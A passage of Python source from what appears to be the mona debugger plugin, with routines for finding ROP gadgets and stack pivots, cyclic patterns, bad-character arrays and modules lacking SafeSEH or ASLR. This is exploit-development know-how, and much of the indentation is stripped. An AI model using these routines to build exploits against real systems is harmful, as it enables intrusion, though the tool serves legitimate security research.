showModuleTable("",modulestosearch)
# ----- ROP ----- #
def procFindROPFUNC(args):
#default criteria
modulecriteria={}
modulecriteria["aslr"] = False
#modulecriteria["rebase"] = False
modulecriteria["os"] = False
criteria={}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
ropfuncs = {}
ropfuncoffsets ={}
ropfuncs,ropfuncoffsets = findROPFUNC(modulecriteria,criteria)
#report findings to log
dbg.log("[+] Processing pointers to interesting rop functions")
logfile = MnLog("ropfunc.txt")
thislog = logfile.reset()
processResults(ropfuncs,logfile,thislog)
global silent
silent = True
dbg.log("[+] Processing offsets to pointers to interesting rop functions")
logfile = MnLog("ropfunc_offset.txt")
thislog = logfile.reset()
processResults(ropfuncoffsets,logfile,thislog)
def procStackPivots(args):
procROP(args,"stackpivot")
def procROP(args,mode="all"):
#default criteria
modulecriteria={}
modulecriteria["aslr"] = False
modulecriteria["rebase"] = False
modulecriteria["os"] = False
criteria={}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
# handle optional arguments
depth = 6
maxoffset = 40
thedistance = 8
split = False
fast = False
endingstr = ""
endings = []
if "depth" in args:
if type(args["depth"]).__name__.lower() != "bool":
try:
depth = int(args["depth"])
except:
pass
if "offset" in args:
if type(args["offset"]).__name__.lower() != "bool":
try:
maxoffset = int(args["offset"])
except:
pass
if "distance" in args:
if type(args["distance"]).__name__.lower() != "bool":
try:
thedistance = args["distance"]
except:
pass
if "split" in args:
if type(args["split"]).__name__.lower() == "bool":
split = args["split"]
if "fast" in args:
if type(args["fast"]).__name__.lower() == "bool":
fast = args["fast"]
if "end" in args:
if type(args["end"]).__name__.lower() == "str":
endingstr = args["end"].replace("'","").replace('"',"").strip()
endings = endingstr.split("#")
if "f" in args:
if args["f"] <> "":
criteria["f"] = args["f"]
if "rva" in args:
criteria["rva"] = True
if mode == "stackpivot":
fast = False
endings = ""
split = False
else:
mode = "all"
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode)
def procJOP(args,mode="all"):
#default criteria
modulecriteria={}
modulecriteria["aslr"] = False
modulecriteria["rebase"] = False
modulecriteria["os"] = False
criteria={}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
# handle optional arguments
depth = 6
if "depth" in args:
if type(args["depth"]).__name__.lower() != "bool":
try:
depth = int(args["depth"])
except:
pass
findJOPGADGETS(modulecriteria,criteria,depth)
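	# create a cyclic pattern of the requested size and write it to pattern.txt
	# in ASCII, hex (\x..) and javascript (unescape friendly) form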
def procCreatePATTERN(args):
size = 0
pattern = ""
if "?" in args and args["?"] != "":
try:
if "0x" in args["?"].lower():
try:
size = int(args["?"],16)
except:
size = 0
else:
size = int(args["?"])
except:
size = 0
if size == 0:
dbg.log("Please enter a valid size",highlight=1)
else:
pattern = createPattern(size,args)
dbg.log("Creating cyclic pattern of %d bytes" % size)
dbg.log(pattern)
global ignoremodules
ignoremodules = True
objpatternfile = MnLog("pattern.txt")
patternfile = objpatternfile.reset()
# ASCII
objpatternfile.write("\nPattern of " + str(size) + " bytes :\n",patternfile)
objpatternfile.write("-" * (19 + len(str(size))),patternfile)
objpatternfile.write("\nASCII:",patternfile)
objpatternfile.write("\n" + pattern,patternfile)
# Hex
patternhex = ""
for patternchar in pattern:
patternhex += str(hex(ord(patternchar))).replace("0x","\\x")
objpatternfile.write("\n\nHEX:\n",patternfile)
objpatternfile.write(patternhex,patternfile)
# Javascript
patternjs = str2js(pattern)
objpatternfile.write("\n\nJAVASCRIPT (unescape() friendly):\n",patternfile)
objpatternfile.write(patternjs,patternfile)
if not silent:
dbg.log("Note: don't copy this pattern from the log window, it might be truncated !",highlight=1)
dbg.log("It's better to open %s and copy the pattern from the file" % patternfile,highlight=1)
ignoremodules = False
return
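	# look up the offset of a given value (e.g. the content of a register at crash time)
	# within the cyclic pattern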
def procOffsetPATTERN(args):
egg = ""
if "?" in args and args["?"] != "":
try:
egg = args["?"]
except:
egg = ""
if egg == "":
dbg.log("Please enter a valid target",highlight=1)
else:
findOffsetInPattern(egg,-1,args)
return
# ----- Comparing file output ----- #
def procFileCOMPARE(args):
modulecriteria={}
criteria={}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
allfiles=[]
tomatch=""
checkstrict=True
rangeval = 0
fast = False
if "ptronly" in args or "ptrsonly" in args:
fast = True
if "f" in args:
if args["f"] <> "":
rawfilenames=args["f"].replace('"',"")
allfiles = rawfilenames.split(',')
dbg.log("[+] Number of files to be examined : %d " % len(allfiles))
if "range" in args:
if not type(args["range"]).__name__.lower() == "bool":
strrange = args["range"].lower()
if strrange.startswith("0x") and len(strrange) > 2 :
rangeval = int(strrange,16)
else:
try:
rangeval = int(args["range"])
except:
rangeval = 0
if rangeval > 0:
dbg.log("[+] Find overlap using pointer +/- range, value %d" % rangeval)
dbg.log(" Note : this will significantly slow down the comparison process !")
else:
dbg.log("Please provide a numeric value ^(> 0) with option -range",highlight=1)
return
else:
if "contains" in args:
if type(args["contains"]).__name__.lower() == "str":
tomatch = args["contains"].replace("'","").replace('"',"")
if "nostrict" in args:
if type(args["nostrict"]).__name__.lower() == "bool":
checkstrict = not args["nostrict"]
dbg.log("[+] Instructions must match in all files ? %s" % checkstrict)
# maybe one of the arguments is a folder
callfiles = allfiles
allfiles = []
for tfile in callfiles:
if os.path.isdir(tfile):
# folder, get all files from this folder
for root,dirs,files in os.walk(tfile):
for dfile in files:
allfiles.append(os.path.join(root,dfile))
else:
allfiles.append(tfile)
if len(allfiles) > 1:
findFILECOMPARISON(modulecriteria,criteria,allfiles,tomatch,checkstrict,rangeval,fast)
else:
dbg.log("Please specify at least 2 filenames to compare",highlight=1)
# ----- Find bytes in memory ----- #
def procFind(args):
modulecriteria={}
criteria={}
pattern = ""
base = 0
offset = 0
top = TOP_USERLAND
consecutive = False
ftype = ""
level = 0
offsetlevel = 0
if not "a" in args:
args["a"] = "*"
ptronly = False
if "ptronly" in args or "ptrsonly" in args:
ptronly = True
#search for all pointers by default
if not "x" in args:
args["x"] = "*"
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
if criteria["accesslevel"] == "":
return
if not "s" in args:
dbg.log("-s <search pattern (or filename)> is a mandatory argument",highlight=1)
return
pattern = args["s"]
if "unicode" in args:
criteria["unic"] = True
if "b" in args:
try:
base = int(args["b"],16)
except:
dbg.log("invalid base address: %s" % args["b"],highlight=1)
return
if "t" in args:
try:
top = int(args["t"],16)
except:
dbg.log("invalid top address: %s" % args["t"],highlight=1)
return
if "offset" in args:
if not args["offset"].__class__.__name__ == "bool":
if "0x" in args["offset"].lower():
try:
offset = 0 - int(args["offset"],16)
except:
dbg.log("invalid offset value",highlight=1)
return
else:
try:
offset = 0 - int(args["offset"])
except:
dbg.log("invalid offset value",highlight=1)
return
else:
dbg.log("invalid offset value",highlight=1)
return
if "level" in args:
try:
level = int(args["level"])
except:
dbg.log("invalid level value",highlight=1)
return
if "offsetlevel" in args:
try:
offsetlevel = int(args["offsetlevel"])
except:
dbg.log("invalid offsetlevel value",highlight=1)
return
if "c" in args:
dbg.log(" - Skipping consecutive pointers, showing size instead")
consecutive = True
if "type" in args:
if not args["type"] in ["bin","asc","ptr","instr","file"]:
dbg.log("Invalid search type : %s" % args["type"], highlight=1)
return
ftype = args["type"]
if ftype == "file":
filename = args["s"].replace('"',"").replace("'","")
#see if we can read the file
if not os.path.isfile(filename):
dbg.log("Unable to find/read file %s" % filename,highlight=1)
return
rangep2p = 0
if "p2p" in args or level > 0:
dbg.log(" - Looking for pointers to pointers")
criteria["p2p"] = True
if "r" in args:
try:
rangep2p = int(args["r"])
except:
pass
if rangep2p > 0:
dbg.log(" - Will search for close pointers (%d bytes backwards)" % rangep2p)
if "p2p" in args:
level = 1
if level > 0:
dbg.log(" - Recursive levels : %d" % level)
allpointers = findPattern(modulecriteria,criteria,pattern,ftype,base,top,consecutive,rangep2p,level,offset,offsetlevel)
logfile = MnLog("find.txt")
thislog = logfile.reset()
processResults(allpointers,logfile,thislog,{},ptronly)
return
# ---- Find instructions, wildcard search ----- #
def procFindWild(args):
modulecriteria={}
criteria={}
pattern = ""
patterntype = ""
base = 0
top = TOP_USERLAND
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
if not "s" in args:
dbg.log("-s <search pattern (or filename)> is a mandatory argument",highlight=1)
return
pattern = args["s"]
patterntypes = ["bin","str"]
if "type" in args:
if type(args["type"]).__name__.lower() != "bool":
if args["type"] in patterntypes:
patterntype = args["type"]
else:
dbg.log("-type argument only takes one of these values: %s" % patterntypes,highlight=1)
return
else:
dbg.log("Please specify a valid value for -type. Valid values are %s" % patterntypes,highlight=1)
return
if patterntype == "":
if "\\x" in pattern:
patterntype = "bin"
else:
patterntype = "str"
if "b" in args:
base,addyok = getAddyArg(args["b"])
if not addyok:
dbg.log("invalid base address: %s" % args["b"],highlight=1)
return
if "t" in args:
top,addyok = getAddyArg(args["t"])
if not addyok:
dbg.log("invalid top address: %s" % args["t"],highlight=1)
return
if "depth" in args:
try:
criteria["depth"] = int(args["depth"])
except:
dbg.log("invalid depth value",highlight=1)
return
if "all" in args:
criteria["all"] = True
if "distance" in args:
if type(args["distance"]).__name__.lower() == "bool":
dbg.log("invalid distance value(s)",highlight=1)
else:
distancestr = args["distance"]
distanceparts = distancestr.split(",")
for parts in distanceparts:
valueparts = parts.split("=")
if len(valueparts) > 1:
if valueparts[0].lower() == "min":
try:
mindistance = int(valueparts[1])
except:
mindistance = 0
if valueparts[0].lower() == "max":
try:
maxdistance = int(valueparts[1])
except:
maxdistance = 0
if maxdistance < mindistance:
tmp = maxdistance
maxdistance = mindistance
mindistance = tmp
criteria["mindistance"] = mindistance
criteria["maxdistance"] = maxdistance
allpointers = findPatternWild(modulecriteria,criteria,pattern,base,top,patterntype)
logfile = MnLog("findwild.txt")
thislog = logfile.reset()
processResults(allpointers,logfile,thislog)
return
# ----- assemble: assemble instructions to opcodes ----- #
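# procAssemble converts the instruction(s) passed via -s into opcode bytes using the
# assemble() helper; the -e (encoder) option is parsed but not implemented yet.
# Illustrative usage (multiple instructions are typically separated with '#'):
#   !mona assemble -s "jmp esp"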
def procAssemble(args):
opcodes = ""
encoder = ""
if not 's' in args:
dbg.log("Mandatory argument -s <opcodes> missing", highlight=1)
return
opcodes = args['s']
if 'e' in args:
# TODO: implement encoder support
dbg.log("Encoder support not yet implemented", highlight=1)
return
        encoder = args['e'].lower()
if encoder not in ["ascii"]:
dbg.log("Invalid encoder : %s" % encoder, highlight=1)
return
assemble(opcodes,encoder)
# ----- info: show information about an address ----- #
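# procInfo prints everything known about a single address (-a): the memory page and section
# it belongs to, whether it sits on a thread stack or in the heap, the owning module (with
# EAT/IAT membership and RVA) and a one-line disassembly. Under WinDBG the output of the
# native '!address' command is appended as well.
# Illustrative usage: !mona info -a esp   (getAddyArg also accepts absolute addresses)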
def procInfo(args):
if not "a" in args:
dbg.log("Missing mandatory argument -a", highlight=1)
return
address,addyok = getAddyArg(args["a"])
if not addyok:
dbg.log("%s is an invalid address" % args["a"], highlight=1)
return
ptr = MnPointer(address)
modname = ptr.belongsTo()
modinfo = None
if modname != "":
modinfo = MnModule(modname)
rebase = ""
rva=0
if modinfo :
rva = address - modinfo.moduleBase
procFlags(args)
dbg.log("")
dbg.log("[+] Information about address 0x%s" % toHex(address))
dbg.log(" %s" % ptr.__str__())
thepage = dbg.getMemoryPageByAddress(address)
dbg.log(" Address is part of page 0x%08x - 0x%08x" % (thepage.getBaseAddress(),thepage.getBaseAddress()+thepage.getSize()))
section = ""
try:
section = thepage.getSection()
except:
section = ""
if section != "":
dbg.log(" Section : %s" % section)
if ptr.isOnStack():
stacks = getStacks()
stackref = ""
for tid in stacks:
currstack = stacks[tid]
if currstack[0] <= address and address <= currstack[1]:
stackref = " (Thread 0x%08x, Stack Base : 0x%08x, Stack Top : 0x%08x)" % (tid,currstack[0],currstack[1])
break
dbg.log(" This address is in a stack segment %s" % stackref)
if modinfo:
dbg.log(" Address is part of a module:")
dbg.log(" %s" % modinfo.__str__())
if rva != 0:
dbg.log(" Offset from module base: 0x%x" % rva)
if modinfo:
eatlist = modinfo.getEAT()
if address in eatlist:
dbg.log(" Address is start of function '%s' in %s" % (eatlist[address],modname))
else:
iatlist = modinfo.getIAT()
if address in iatlist:
iatentry = iatlist[address]
dbg.log(" Address is part of IAT, and contains pointer to '%s'" % iatentry)
else:
output = ""
if ptr.isInHeap():
dbg.log(" This address resides in the heap")
dbg.log("")
ptr.showHeapBlockInfo()
else:
dbg.log(" Module: None")
try:
dbg.log("")
dbg.log("[+] Disassembly:")
op = dbg.disasm(address)
opstring=getDisasmInstruction(op)
dbg.log(" Instruction at %s : %s" % (toHex(address),opstring))
except:
pass
if __DEBUGGERAPP__ == "WinDBG":
dbg.log("")
dbg.log("Output of !address 0x%08x:" % address)
output = dbg.nativeCommand("!address 0x%08x" % address)
dbg.logLines(output)
dbg.log("")
# ----- dump: Dump some memory to a file ----- #
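# procDump writes a raw copy of process memory to disk: -s is the start address, the length
# comes either from -n <size> or from -e <end address>, and -f names the output file
# (the filename below is illustrative).
# Illustrative usage: !mona dump -s 0x10001000 -n 0x200 -f dumped.bin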
def procDump(args):
filename = ""
if "f" not in args:
dbg.log("Missing mandatory argument -f filename", highlight=1)
return
filename = args["f"]
address = None
if "s" not in args:
dbg.log("Missing mandatory argument -s address", highlight=1)
return
startaddress = str(args["s"]).replace("0x","").replace("0X","")
if not isAddress(startaddress):
dbg.log("You have specified an invalid start address", highlight=1)
return
address = addrToInt(startaddress)
size = 0
if "n" in args:
size = int(args["n"])
elif "e" in args:
endaddress = str(args["e"]).replace("0x","").replace("0X","")
if not isAddress(endaddress):
dbg.log("You have specified an invalid end address", highlight=1)
return
end = addrToInt(endaddress)
if end < address:
dbg.log("end address %s is before start address %s" % (args["e"],args["s"]), highlight=1)
return
size = end - address
else:
dbg.log("you need to specify either the size of the copy with -n or the end address with -e ", highlight=1)
return
dumpMemoryToFile(address,size,filename)
# ----- compare : Compare contents of a file with copy in memory, indicate bad chars / corruption ----- #
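# procCompare reads a reference file (usually the bytearray.bin produced by procByteArray),
# locates and compares it in memory and reports corrupted or missing bytes - the typical way
# to hunt for bad characters. -a pins the comparison to a known address, -s skips copies found
# inside modules, -unicode also looks for a unicode-expanded copy.
# Illustrative usage: !mona compare -f bytearray.bin -a 0x0012f000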
def procCompare(args):
startpos = 0
filename = ""
skipmodules = False
findunicode = False
allregs = dbg.getRegs()
if "f" in args:
filename = args["f"].replace('"',"").replace("'","")
#see if we can read the file
if not os.path.isfile(filename):
dbg.log("Unable to find/read file %s" % filename,highlight=1)
return
else:
dbg.log("You must specify a valid filename using parameter -f", highlight=1)
return
if "a" in args:
startpos,addyok = getAddyArg(args["a"])
if not addyok:
dbg.log("%s is an invalid address" % args["a"], highlight=1)
return
if "s" in args:
skipmodules = True
if "unicode" in args:
findunicode = True
compareFileWithMemory(filename,startpos,skipmodules,findunicode)
# ----- offset: Calculate the offset between two addresses ----- #
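# procOffset computes the distance between two addresses/registers (-a1, -a2). When -a1 is
# above -a2 the negative distance is shown as a 32bit two's complement value, e.g. going from
# 0x0012ff40 back to 0x0012ff00 is -0x40 = 0xFFFFFFC0, printed little-endian as
# "\xc0\xff\xff\xff" (worked example for illustration only).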
def procOffset(args):
extratext1 = ""
extratext2 = ""
isReg_a1 = False
isReg_a2 = False
regs = dbg.getRegs()
if "a1" not in args:
dbg.log("Missing mandatory argument -a1 <address>", highlight=1)
return
a1 = args["a1"]
if "a2" not in args:
dbg.log("Missing mandatory argument -a2 <address>", highlight=1)
return
a2 = args["a2"]
a1,addyok = getAddyArg(args["a1"])
if not addyok:
dbg.log("0x%08x is not a valid address" % a1, highlight=1)
return
a2,addyok = getAddyArg(args["a2"])
if not addyok:
dbg.log("0x%08x is not a valid address" % a2, highlight=1)
return
    diff = a2 - a1
    result = toHex(diff)
    if a1 > a2:
        # negative distance : express it as a 32bit two's complement value
        ndiff = a1 - a2
        result = toHex(4294967296 - ndiff)
    # little-endian byte representation of the (possibly negative) offset
    jmpbytes = "\\x" + result[6] + result[7] + "\\x" + result[4] + result[5] + "\\x" + result[2] + result[3] + "\\x" + result[0] + result[1]
    dbg.log("Offset from 0x%08x to 0x%08x : %d (0x%s) bytes" % (a1,a2,diff,result))
    if a1 > a2:
        dbg.log("Negative jmp offset : %s" % jmpbytes)
    else:
        dbg.log("Jmp offset : %s" % jmpbytes)
return
# ----- bp: Set a breakpoint on read/write/exe access ----- #
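# procBp places a memory breakpoint on the address given with -a (an absolute address, a
# register, or modulename!functionname, resolved through the module EAT or, under WinDBG,
# the symbol resolver). -t selects the access type: READ, WRITE or SFX/EXEC.
# Illustrative usage: !mona bp -a kernel32!createfilea -t EXEC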
def procBp(args):
isReg_a = False
regs = dbg.getRegs()
thistype = ""
if "a" not in args:
dbg.log("Missing mandatory argument -a address", highlight=1)
dbg.log("The address can be an absolute address, a register, or a modulename!functionname")
return
a = str(args["a"])
for reg in regs:
if reg.upper() == a.upper():
a=toHex(regs[reg])
isReg_a = True
break
a = a.upper().replace("0X","").lower()
if not isAddress(str(a)):
# maybe it's a modulename!function
if str(a).find("!") > -1:
modparts = str(a).split("!")
modname = modparts[0]
if not modname.lower().endswith(".dll"):
modname += ".dll"
themodule = MnModule(modname)
if themodule != None and len(modparts) > 1:
eatlist = themodule.getEAT()
funcname = modparts[1].lower()
addyfound = False
for eatentry in eatlist:
if eatlist[eatentry].lower() == funcname:
a = "%08x" % (eatentry)
addyfound = True
break
if not addyfound:
# maybe it's just a symbol, try to resolve
if __DEBUGGERAPP__ == "WinDBG":
symboladdress = dbg.resolveSymbol(a)
if symboladdress != "" :
a = symboladdress
addyfound = True
if not addyfound:
dbg.log("Please specify a valid address/register/modulename!functionname (-a)", highlight=1)
return
else:
dbg.log("Please specify a valid address/register/modulename!functionname (-a)", highlight=1)
return
else:
dbg.log("Please specify a valid address/register/modulename!functionname (-a)", highlight=1)
return
valid_types = ["READ", "WRITE", "SFX", "EXEC"]
if "t" not in args:
dbg.log("Missing mandatory argument -t type", highlight=1)
dbg.log("Valid types are: %s" % ", ".join(valid_types))
return
else:
thistype = args["t"].upper()
if not thistype in valid_types:
dbg.log("Invalid type : %s" % thistype)
return
if thistype == "EXEC":
thistype = "SFX"
a = hexStrToInt(a)
dbg.setMemBreakpoint(a,thistype[0])
dbg.log("Breakpoint set on %s of 0x%s" % (thistype,toHex(a)),highlight=1)
# ----- ct: calltrace ---- #
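# procCallTrace hooks every CALL instruction in the modules selected with -m (and every RETN
# as well when -r is given) and logs the hits to calltrace.txt. -a <n> controls how many
# stack arguments get dumped per call; a built-in ignore list filters very noisy Win32 APIs
# unless -all is specified.
# Illustrative usage: !mona calltrace -m mymodule.dll -a 4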
def procCallTrace(args):
modulecriteria={}
criteria={}
criteria["accesslevel"] = "X"
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
modulestosearch = getModulesToQuery(modulecriteria)
hooks = []
rethooks = []
showargs = 0
hookrets = False
if not "m" in args:
dbg.log(" ** Please specify what module(s) you want to include in the trace, using argument -m **",highlight=1)
return
if "a" in args:
if args["a"] != "":
try:
showargs = int(args["a"])
except:
showargs = 0
if "r" in args:
hookrets = True
toignore = []
limit_scope = True
if not "all" in args:
# fill up array
toignore.append("PeekMessage")
toignore.append("GetParent")
toignore.append("GetFocus")
toignore.append("EnterCritical")
toignore.append("LeaveCritical")
toignore.append("GetWindow")
toignore.append("CallnextHook")
toignore.append("TlsGetValue")
toignore.append("DefWindowProc")
toignore.append("SetTextColor")
toignore.append("DrawText")
toignore.append("TranslateAccel")
toignore.append("TranslateMessage")
toignore.append("DispatchMessage")
toignore.append("isChild")
toignore.append("GetSysColor")
toignore.append("SetBkColor")
toignore.append("GetDlgCtrl")
toignore.append("CallWindowProc")
toignore.append("HideCaret")
toignore.append("MessageBeep")
toignore.append("SetWindowText")
toignore.append("GetDlgItem")
toignore.append("SetFocus")
toignore.append("SetCursor")
toignore.append("LoadCursor")
toignore.append("SetEvent")
toignore.append("SetDlgItem")
toignore.append("SetWindowPos")
toignore.append("GetDC")
toignore.append("ReleaseDC")
toignore.append("GetDeviceCaps")
toignore.append("GetClientRect")
toignore.append("etLastError")
else:
limit_scope = False
if len( modulestosearch) > 0:
dbg.log("[+] Initializing log file")
logfile = MnLog("calltrace.txt")
thislog = logfile.reset()
dbg.log("[+] Number of CALL arguments to display : %d" % showargs)
dbg.log("[+] Finding instructions & placing hooks")
for thismod in modulestosearch:
dbg.updateLog()
objMod = dbg.getModule(thismod)
if not objMod.isAnalysed:
dbg.log(" Analysing code...")
objMod.Analyse()
themod = MnModule(thismod)
modcodebase = themod.moduleCodebase
modcodetop = themod.moduleCodetop
dbg.setStatusBar("Placing hooks in %s..." % thismod)
dbg.log(" * %s (0x%08x - 0x%08x)" % (thismod,modcodebase,modcodetop))
ccnt = 0
rcnt = 0
thisaddr = modcodebase
allfuncs = dbg.getAllFunctions(modcodebase)
for func in allfuncs:
thisaddr = func
thisfunc = dbg.getFunction(thisaddr)
instrcnt = 0
while thisfunc.hasAddress(thisaddr):
try:
if instrcnt == 0:
thisopcode = dbg.disasm(thisaddr)
else:
thisopcode = dbg.disasmForward(thisaddr,1)
thisaddr = thisopcode.getAddress()
instruction = getDisasmInstruction(thisopcode)
if instruction.startswith("CALL "):
ignore_this_instruction = False
for ignores in toignore:
if instruction.lower().find(ignores.lower()) > -1:
ignore_this_instruction = True
break
if not ignore_this_instruction:
if not thisaddr in hooks:
hooks.append(thisaddr)
myhook = MnCallTraceHook(thisaddr,showargs,instruction,thislog)
myhook.add("HOOK_CT_%s" % thisaddr , thisaddr)
ccnt += 1
if hookrets and instruction.startswith("RETN"):
if not thisaddr in rethooks:
rethooks.append(thisaddr)
myhook = MnCallTraceHook(thisaddr,showargs,instruction,thislog)
myhook.add("HOOK_CT_%s" % thisaddr , thisaddr)
except:
#dbg.logLines(traceback.format_exc(),highlight=True)
break
instrcnt += 1
dbg.log("[+] Total number of CALL hooks placed : %d" % len(hooks))
if hookrets:
dbg.log("[+] Total number of RETN hooks placed : %d" % len(rethooks))
else:
dbg.log("[!] No modules selected or found",highlight=1)
return "Done"
# ----- bu: set a deferred breakpoint ---- #
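# procBu ("break upon") takes a comma separated list of targets via -a (absolute addresses,
# module.function or module+offset). Targets that are already mapped get a breakpoint right
# away; for the rest, hooks on the end of LoadLibraryA/LoadLibraryW retry the lookup each time
# a new module gets loaded, which turns this into a deferred breakpoint.
# Illustrative usage: !mona bu -a "msvcrt.memcpy,10001000"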
def procBu(args):
if not "a" in args:
dbg.log("No targets defined. (-a)",highlight=1)
return
else:
allargs = args["a"]
bpargs = allargs.split(",")
breakpoints = {}
dbg.log("")
dbg.log("Received %d addresses//functions to process" % len(bpargs))
# set a breakpoint right away for addresses and functions that are mapped already
for tbparg in bpargs:
bparg = tbparg.replace(" ","")
# address or module.function ?
if bparg.find(".") > -1:
functionaddress = dbg.getAddress(bparg)
if functionaddress > 0:
# module.function is already mapped, we can set a bp right away
dbg.setBreakpoint(functionaddress)
breakpoints[bparg] = True
dbg.log("Breakpoint set at 0x%08x (%s), was already mapped" % (functionaddress,bparg), highlight=1)
else:
breakpoints[bparg] = False # no breakpoint set yet
elif bparg.find("+") > -1:
ptrparts = bparg.split("+")
modname = ptrparts[0]
if not modname.lower().endswith(".dll"):
modname += ".dll"
themodule = getModuleObj(modname)
if themodule != None and len(ptrparts) > 1:
address = themodule.getBase() + int(ptrparts[1],16)
if address > 0:
dbg.log("Breakpoint set at %s (0x%08x), was already mapped" % (bparg,address),highlight=1)
dbg.setBreakpoint(address)
breakpoints[bparg] = True
else:
breakpoints[bparg] = False
else:
breakpoints[bparg] = False
if bparg.find(".") == -1 and bparg.find("+") == -1:
# address, see if it is mapped, by reading one byte from that location
address = -1
try:
address = int(bparg,16)
except:
pass
thispage = dbg.getMemoryPageByAddress(address)
if thispage != None:
dbg.setBreakpoint(address)
dbg.log("Breakpoint set at 0x%08x, was already mapped" % address, highlight=1)
breakpoints[bparg] = True
else:
breakpoints[bparg] = False
# get the correct addresses to put hook on
loadlibraryA = dbg.getAddress("kernel32.LoadLibraryA")
loadlibraryW = dbg.getAddress("kernel32.LoadLibraryW")
if loadlibraryA > 0 and loadlibraryW > 0:
# find end of function for each
endAfound = False
endWfound = False
cnt = 1
while not endAfound:
objInstr = dbg.disasmForward(loadlibraryA, cnt)
strInstr = getDisasmInstruction(objInstr)
if strInstr.startswith("RETN"):
endAfound = True
loadlibraryA = objInstr.getAddress()
cnt += 1
cnt = 1
while not endWfound:
objInstr = dbg.disasmForward(loadlibraryW, cnt)
strInstr = getDisasmInstruction(objInstr)
if strInstr.startswith("RETN"):
endWfound = True
loadlibraryW = objInstr.getAddress()
cnt += 1
# if addresses/functions are left, throw them into their own hooks,
# one for each LoadLibrary type.
hooksplaced = False
for bptarget in breakpoints:
if not breakpoints[bptarget]:
myhookA = MnDeferredHook(loadlibraryA, bptarget)
myhookA.add("HOOK_A_%s" % bptarget, loadlibraryA)
myhookW = MnDeferredHook(loadlibraryW, bptarget)
myhookW.add("HOOK_W_%s" % bptarget, loadlibraryW)
dbg.log("Hooks for %s installed" % bptarget)
hooksplaced = True
if not hooksplaced:
dbg.log("No hooks placed")
else:
dbg.log("** Unable to place hooks, make sure kernel32.dll is loaded",highlight=1)
return "Done"
# ----- bf: Set a breakpoint on exported functions of a module ----- #
def procBf(args):
funcfilter = ""
mode = ""
type = "export"
modes = ["add","del","list"]
types = ["import","export","iat","eat"]
modulecriteria={}
criteria={}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
if "s" in args:
try:
funcfilter = args["s"].lower()
except:
dbg.log("No functions selected. (-s)",highlight=1)
return
else:
dbg.log("No functions selected. (-s)",highlight=1)
return
if "t" in args:
try:
mode = args["t"].lower()
except:
pass
if "f" in args:
try:
type = args["f"].lower()
except:
pass
if not type in types:
dbg.log("No valid function type selected (-f <import|export>)",highlight=1)
return
    if not mode in modes or mode=="":
        dbg.log("No valid action defined. (-t add|del|list)",highlight=1)
        return
    doManageBpOnFunc(modulecriteria,criteria,funcfilter,mode,type)
return
# ----- Show info about modules -------#
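# The three procModInfo* helpers below are canned module filters: procModInfoS lists modules
# without SafeSEH, procModInfoSA additionally requires no ASLR and no rebase, and procModInfoA
# only filters on ASLR/rebase. They all just feed modulecriteria into getModulesToQuery() and
# print the resulting module table.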
def procModInfoS(args):
modulecriteria = {}
criteria = {}
modulecriteria["safeseh"] = False
dbg.log("Safeseh unprotected modules :")
modulestosearch = getModulesToQuery(modulecriteria)
showModuleTable("",modulestosearch)
return
def procModInfoSA(args):
modulecriteria = {}
criteria = {}
modulecriteria["safeseh"] = False
modulecriteria["aslr"] = False
modulecriteria["rebase"] = False
dbg.log("Safeseh unprotected, no aslr & no rebase modules :")
modulestosearch = getModulesToQuery(modulecriteria)
showModuleTable("",modulestosearch)
return
def procModInfoA(args):
modulecriteria = {}
criteria = {}
modulecriteria["aslr"] = False
modulecriteria["rebase"] = False
dbg.log("No aslr & no rebase modules :")
modulestosearch = getModulesToQuery(modulecriteria)
showModuleTable("",modulestosearch)
return
# ----- Print byte array ----- #
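# procByteArray writes an array with every byte value 0x00-0xff (or 0xff down to 0x00 with -r)
# to bytearray.txt and bytearray.bin, leaving out the bad chars passed via -cpb. A ".." inside
# the badchar string is expanded to the full range between the surrounding bytes, so
# "\x00..\x0a" excludes 0x00 through 0x0a.
# Illustrative usage: !mona bytearray -cpb "\x00\x0a\x0d"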
def procByteArray(args):
badchars = ""
forward = True
startval = 0
endval = 255
sign = 1
bytesperline = 32
if "b" in args:
dbg.log(" *** Note: parameter -b has been deprecated and replaced with -cpb ***")
if type(args["b"]).__name__.lower() != "bool":
if not "cpb" in args:
args["cpb"] = args["b"]
if "r" in args:
forward = False
startval = -255
endval = 0
sign = -1
badchars = ""
if "cpb" in args:
badchars = args["cpb"]
badchars = badchars.replace("'","")
badchars = badchars.replace('"',"")
badchars = badchars.replace("\\x","")
# see if we need to expand ..
bpos = 0
newbadchars = ""
while bpos < len(badchars):
curchar = badchars[bpos]+badchars[bpos+1]
if curchar == "..":
pos = bpos
if pos > 1 and pos <= len(badchars)-4:
# get byte before and after ..
bytebefore = badchars[pos-2] + badchars[pos-1]
byteafter = badchars[pos+2] + badchars[pos+3]
bbefore = int(bytebefore,16)
bafter = int(byteafter,16)
insertbytes = ""
bbefore += 1
while bbefore < bafter:
insertbytes += "%02x" % bbefore
bbefore += 1
newbadchars += insertbytes
else:
newbadchars += curchar
bpos += 2
badchars = newbadchars
cnt = 0
strb = ""
while cnt < len(badchars):
strb=strb+binascii.a2b_hex(badchars[cnt]+badchars[cnt+1])
cnt=cnt+2
dbg.log("Generating table, excluding %d bad chars..." % len(strb))
arraytable = []
binarray = ""
while startval <= endval:
thisval = startval * sign
hexbyte = hex(thisval)[2:]
binbyte = hex2bin(toHexByte(thisval))
if len(hexbyte) == 1:
hexbyte = "0" + hexbyte
hexbyte2 = binascii.a2b_hex(hexbyte)
if not hexbyte2 in strb:
arraytable.append(hexbyte)
binarray += binbyte
startval += 1
dbg.log("Dumping table to file")
output = ""
cnt = 0
outputline = '"'
totalbytes = len(arraytable)
tablecnt = 0
while tablecnt < totalbytes:
if (cnt < bytesperline):
outputline += "\\x" + arraytable[tablecnt]
else:
outputline += '"\n'
cnt = 0
output += outputline
outputline = '"\\x' + arraytable[tablecnt]
tablecnt += 1
cnt += 1
if (cnt-1) < bytesperline:
outputline += '"\n'
output += outputline
global ignoremodules
ignoremodules = True
arrayfilename="bytearray.txt"
objarrayfile = MnLog(arrayfilename)
arrayfile = objarrayfile.reset()
binfilename = arrayfile.replace("bytearray.txt","bytearray.bin")
